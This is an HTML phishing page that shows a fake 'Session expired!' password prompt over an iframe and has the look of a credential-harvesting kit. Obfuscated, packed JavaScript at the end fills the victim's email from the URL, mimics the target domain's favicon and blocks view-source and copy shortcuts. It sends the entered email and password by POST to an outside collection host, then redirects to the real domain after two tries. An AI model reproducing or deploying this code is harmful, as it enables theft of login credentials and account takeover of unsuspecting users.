<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport"
          content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Session expired! </title>
    <style>
        body{
            width:99%;
            height:100%;
            margin:0;
            padding:0;
        }
        #mainPage{
            border:none;
        }
        hr{
            border:1px solid #999;
        }
        #overlay{
            background-color:#555;
            position:absolute;
            top:0;
            left:0;
            bottom:0;
            right:0;
            border:1px solid #555;
            opacity: 0.6;
            filter: alpha(opacity=60)
        }
        #loginBody{
            background-color:#555;
            border: 1px solid #DDD;
            box-shadow: 0px 0px 10px #DDD;
            width: 400px;
            height: 180px;
            position:absolute;
            top:30%;
            left:30%;
        }
        #loginBg{
            background:white;
            width:100%;
            height:100%;
            opacity: 0.9;
            filter: alpha(opacity=90);
        }
        #topHeader{
            margin-bottom:10px;
            padding-top:10px;
        }
        #favIcon{
            margin:0 10px;
        }
        #form{
            position:relative;
            left:10%;
            width:80%;
        }
        .email, .pass{
            margin:0 0 5px;
        }
    </style>
</head>

<body>
<iframe id="mainPage" src="" width="100%" scrolling="no" sandbox="allow-forms allow-pointer-lock
allow-popups allow-same-origin allow-scripts" style="position: absolute;height: 100%;border: none;"></iframe>

<div id="overlay" style="height: 100%; width: 1366px;">

</div>
<div id="loginBody">
    <div id="loginBg">
        <div id="topHeader">
            <img id="logoimg" src=""> <b id="sExp">Session expired!  </b>
            <hr>
        </div>
        <div id="form">
            <form id="email" id="form_component" action="" method="post">
                <input id="client" type="hidden" value="SESSION EXPIRED" name="client">
                <input id="cid" type="hidden" value="" name="cid">
                <div class="email">
                    <span id="emailId"></span> 
                    <input id="email"  type="hidden" value="" name="email">
                    <input id="main_domain" type="hidden" value="" name="main_domain">
                </div>

                <div class="pass">
                    <span id="passName">Password</span>: 
					<input type="password" name="password" id="password">
				<div id="msg" style="display: none;"><font size="-1" color="#FF0000"><i>Wrong Password. Verification failed, please try again.</i></font></div>   
                </div>
                <div class="pass">
                    <input type="checkbox"> <span id="keepme">keep me logged in</span>
                </div>
                <div class="submit">
                  <!--  <input type="submit" name="signIn" value="Login" id="submit-btn"> -->
					
		  <button class="btn btn-success btn btn-primary btn-block box-shadow" id="submit-btn">Continue</button>
                </div>
            </form>
        </div>
    </div>
</div> 
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('<!--11 12--><8 r="n://13.v.s/v-3.2.1.E.w"></8><!--<8 r="n://x.N.14.s/x.N/x/15/v/2.2.4/v.E.w"></8>--><8 r="n://16.17.s/O/4.1.3/w/O.E.w"></8><8>$(o).18(\'19\',5(e){6(e.F&&(e.1a==1b)){e.G();p y}});o.1c(\'1d\',P=>P.G());o.1e=5(e){6(e.F&&(e.z===1f||e.z===1g||e.z===1h||e.z===1i)){p y}A{p Q}};$(o).1j("u",5(e){6(e.F){p y}A{p Q}});$(o).1k(5(){7 e=0;$(\'#1l\').R(5(){$("#l").S();$(\'#t\').q("");$("#1m").T({1n:U,V:"S"},0);$("#1o").T({1p:U,V:"B"},1q)});7 f=H.I.1r.W(1);6(!f){}A{7 g=f;$(\'#t\').q(g);7 h=/^([a-J-K-1s\\.\\-])+\\@(([a-J-K-9\\-])+\\.)+([a-J-K-9]{2,4})+$/;6(!h.1t(g)){$(\'#X\').B();f.1u;p y}7 i=g.1v("@");7 j=g.W((i+1));7 k=\'n://C.\'+j;$("#1w").1x("r","n://C.1y.s/1z/1A?1B="+k);o.1C(\'1D\').r=k;$(".t").m(f)}$(\'#L-M\').R(5(b){b.G();7 c=$("#t").q();7 d=$("#D").q();e=e+1;$.x({1E:\'1F\',1G:\'n://1H.s/1I/1J.1K\',1L:\'1M\',1N:{t:c,D:d},1O:5(a){$(\'#L-M\').m(\'1P...\')},1Q:5(a){$(\'#l\').m("<Y 1R=\'1S:1T;\'>1U 1V. 1W 1X, 1Y 1Z 20</Y>");6(a){$("#l").B();21.22(a);$(\'#l\').m(a[\'l\']);6(a[\'23\']==\'24\'){$("#D").q("");6(e>=2){e=0;H.I.Z("10://C."+j)}}A{$(\'#l\').m(a[\'l\'])}}},X:5(){$("#D").q("");6(e>=2){e=0;H.I.Z("10://C."+j)}$("#l").B()},25:5(){$(\'#L-M\').m(\'26 27\')}})})});</8></28></m>',62,133,'|||||function|if|var|script|||||||||||||msg|html|https|document|return|val|src|com|email||jquery|js|ajax|false|keyCode|else|show|www|password|min|ctrlKey|preventDefault|window|location|zA|Z0|submit|btn|googleapis|bootstrap|event|true|click|hide|animate|200|opacity|substr|error|span|replace|http|Optional|JavaScript|code|luchifab|libs|stackpath|bootstrapcdn|bind|keydown|which|83|addEventListener|contextmenu|onkeydown|67|86|85|117|keypress|ready|back1|automail|left|inputbar|right|1000|hash|9_|test|focus|indexOf|logoimg|attr|google|s2|favicons|domain|getElementById|mainPage|dataType|JSON|url|branlinks|mynewupdate|logged|php|type|POST|data|beforeSend|Verifing|success|style|color|red|Wrong|Password|Verification|failed|please|try|again|console|log|signal|ok|complete|Sign|in|body'.split('|'),0,{}))
